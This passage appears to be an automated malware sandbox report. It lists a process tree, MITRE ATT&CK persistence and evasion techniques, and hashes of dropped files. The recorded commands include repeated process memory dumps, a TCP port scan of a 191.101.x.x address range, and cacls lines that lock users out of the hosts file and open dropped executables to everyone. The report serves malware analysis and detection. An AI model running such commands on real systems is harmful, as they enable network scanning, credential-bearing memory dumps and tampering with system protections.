C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4052 C:\Windows\TEMP\nzlegstrv\4052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1252 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2192 C:\Windows\TEMP\nzlegstrv\2192.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4652 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2740 C:\Windows\TEMP\nzlegstrv\2740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2024 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1952 C:\Windows\TEMP\nzlegstrv\1952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 5076 C:\Windows\TEMP\nzlegstrv\5076.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 4488 C:\Windows\TEMP\nzlegstrv\4488.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3852 C:\Windows\TEMP\nzlegstrv\3852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\nzlegstrv\yuiezklii\scan.bat2⤵PID:3712
-
C:\Windows\nzlegstrv\yuiezklii\zbesiipnm.exezbesiipnm.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3044 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3712 C:\Windows\TEMP\nzlegstrv\3712.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5540 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3560 C:\Windows\TEMP\nzlegstrv\3560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4576 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5196
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5564
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4336
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5836
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5896
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5324
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5956
-
C:\Windows\SysWOW64\tyxtue.exeC:\Windows\SysWOW64\tyxtue.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3860
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F1⤵PID:64
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2492
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F2⤵PID:2328
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F1⤵PID:1620
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4268
-
C:\Windows\system32\cacls.execacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F2⤵PID:2252
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe1⤵PID:1928
-
C:\Windows\ime\bbleyvb.exeC:\Windows\ime\bbleyvb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4224
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F1⤵PID:2788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4440
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F2⤵PID:4040
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F1⤵PID:5516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5528
-
C:\Windows\system32\cacls.execacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F2⤵PID:5268
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe1⤵PID:5496
-
C:\Windows\ime\bbleyvb.exeC:\Windows\ime\bbleyvb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6004
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
33.9MB
MD573eef69287f3d26daa7d50bfc6a05cfd
SHA12c8e6ede811bd685bf797b05ce80e18b8691a6f6
SHA25622af18dbed7a4a73bb3b246d48a9662193d852b40f72a3d9d492eb45b1ba31f5
SHA5128a8318d8ab58eb33509ae6eddf0abe8bbaceb9d8c866afd676d490b40190eae63da402217efad0c14a84c081184e6fc12ab951fb4423ca22812e03643539d7be
-
Filesize
25.7MB
MD520982ea600d926e404c6878941476bf9
SHA1c04c3907bf3106ded5a15d84a85f4951e27690d2
SHA256616af3e5f9f447b8bddb59db13678afe12064327d1934d04a08e7e853d69eea2
SHA512b8483732cee10ff9d8003ec0f4cb043d3b8f33740242deade79c021dc56e1f55d1c90827b3dfd093fd3b2ee3e5b2e4e008d2fdce49948abd2cb45dcf3578dfb9
-
Filesize
4.2MB
MD5001686aba6c206927c91bcb58a03f367
SHA1c7d5be9c2b6bf31674bd590a1287734cfa0db202
SHA25620f20ff7b28cf91cf21eb3bd721056d526a7df0b1976f273c2c80e8957243056
SHA5121e7ed5c9548ea789703be4d26916de64c23a633b6adf7db748d81609d45a1c1c3e0201f7fdd34e0c289d80d8544ad1f681cb9a6b7677e84f1607d3a43b9ebedd
-
Filesize
44.5MB
MD5f25a3159a6ae64150930332a5112245f
SHA1a4457a7ed33d7fda565d0bc15c354f49fddb6f03
SHA2568aac42cfd8db6a4afe49a24aea4f2024e8c7a1c0fc4dfa8b9a80ae27ff2a0897
SHA51285acde582a32aa2cf88993bc9d3d2b5d2104e6e45786ef97c3507e6e9d710ae0bc3642f4a844b2ff05bc10220d7a2b06ccb2d0ad438a6160e20f181201d611cc
-
Filesize
3.7MB
MD5509c89ad074a177fcd93c8ca7da9e0b5
SHA1c5adf65b8a0b93a7eca2a580bcd39c4ec8212c08
SHA2561aef6babade5d6db13122b9b20975a85ded76e2f8617f722681174d314221564
SHA512325a92fda9760265c9a4921e7d3377caeb2180680e5cabe8fd23cb17a5628920a86b300593977010f9d1ec6bd33eef196fe802f6ad6910421a53ac694cbb6f84
-
Filesize
1.2MB
MD52458b470af38c0ac8c3668c81fd1aee1
SHA11e83b9f9f104100d47ae793853e7c5251b3f48e1
SHA2560ec3230aa079da05dbc0995b81d4d985f5c9f7d5ce2c9334349937756f3b6165
SHA512fe04421b8f29683f41b4dc3de9519ad5d14dcc1e40613ddf1c028bcb56e4602f82f2b11979d224837d6a300fb96097054efa7c7818c89a4237e93d7b09da4632
-
Filesize
7.7MB
MD57b8f18e3bf210991fa6064e0176b9651
SHA168a334917d908c72b652acb7c4e482382f14876c
SHA256313dd1c5a498f1db747d77594d4889644dfde21c51e8ac82b5a446e3ca11c645
SHA5121439e3d7a41eef0bb0ccaebf287494bc63f3f7c518c1d99b69b8d208109f67832da07037d0ca9c6d08c180b4bbb5d21b1ebe4cc90f9db92b89221686adb408a9
-
Filesize
3.0MB
MD5381c50ea4b86d1ff95ec292baa04f090
SHA1b874c4d31a736fcb69a82c955cf697fbb71c69bd
SHA256a462f238b2d87aad9596ec1da393f1298f395c1fc406178399cb9ac99b9a61f0
SHA512dd68eaf7e56833973e57a195a216c09461502c3dbc4e6832a6a718d5c3b209f6bb82c6f1172cae17fbd670c947fedb6d576fd12e5ceade49265fd1d65e888992
-
Filesize
826KB
MD589c99c51bb9c6043a234c6a1b6461441
SHA11e6f72cabadc60611d2f408ff01284a041ca3599
SHA256a9cc5856573fe489876c96f6ccc0f3d69be9685ebac7fed56a793005176cefe6
SHA512b92a77e34c12dddd353e4fafe82d29439284b5125d212f45a6c633d2bea7f9b0a23bcdc26aa1ef59a2c30a33c590edd3e6d1a941d81d996555480fb1e10ab024
-
Filesize
2.5MB
MD5af0bf682effb629d7ae7f935f4be318a
SHA13ada0323345b83ebf89a56e43e8f0bc7da957d4e
SHA256ed2d50847bbb95a17f4ae7f89722e8ba295f9cdc74c3bf37705534af6d5a8592
SHA512a7c9536824916d23f569ec42d4c54ffd587d6f706fb6302914bc81e9233235b0d5ba568b8917f902f24e87e6be3e1dccb2255fdadfeb152dd0432efdcb75b460
-
Filesize
20.5MB
MD5c16ef9a90b2668d9aa2d17f08c851300
SHA1e902285ac7a0c28e2951ae0c49074a13d57053cc
SHA2560d52bf7f2890c51460b4de38dcbe5983d5289d8575d7ace335fe3e7666834ab6
SHA512e25559f6d28dfe0790ab221e138016acf9cfe4f247c697a8401db5b2633cf65391c2d726440d66d6dead6c11b31279e19278d1a82f5054ca7e8f6dc16e0517a0
-
Filesize
4.1MB
MD57e6d216b511e215002af9943f0c8b08c
SHA19210003e5c08e5cd52523d47820b4cbebe3dcda3
SHA2568079931013a63747261c854d36b65473ca0be31ba49b5cddd790f1086910ee39
SHA512349239a20d355d09f8a5a23a366f75930b6e2bce4403b836771045973912398b56f42abf1355d3cf20685f855b6a6dfcb490a7e68a1d0ef992bfffdc67346fdf
-
Filesize
8.7MB
MD569c1b8071e2521b7168bda04c9da4f95
SHA10777e5b1f27b6f2011405fc98593b090ed2cdab0
SHA256c1184d56014591600d534a1d74fd8aee86ae73a48f10da8db91adfcdd37752a5
SHA512af080f19deba580de4ef67f689ac25597ff5525eb484c51f1cec7022c581f6a43135fab7340b1f2be684d4e1c880afc991c373794beee537430600aaf39097cf
-
Filesize
1.9MB
MD5a6a8fab1ca8eb6a1a3b687cff9713938
SHA10fe59737630490f267f62df394faf014a6616b96
SHA256573dc94720d303e4b2200b70676a8085d3663f8f130993fbefd809babb4117b7
SHA5127feb7807f0eb613ad695e81cc4327e98fc2a096ef71fff47a805d1f4341531488625045b8523e9bbc0e207e7c60432579b9f708695b839439c0897719d98252c
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
10.9MB
MD56ff8fd0e778f2eec0fd8273c9b960d83
SHA1f66353d9930567bd820c70c3994127b70448ca32
SHA2564a033c7f18b48fb0c15467aa708dfd43629028f3fdf193f7ae699d299031cbfb
SHA51224d69e56666f970953d460e0fd93c0ff2107d3ed38b26b190372935d93fe1417c456d3bf5f8250f70039aeac21e0832df6bb56b890d6671824834d6ddf215692
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376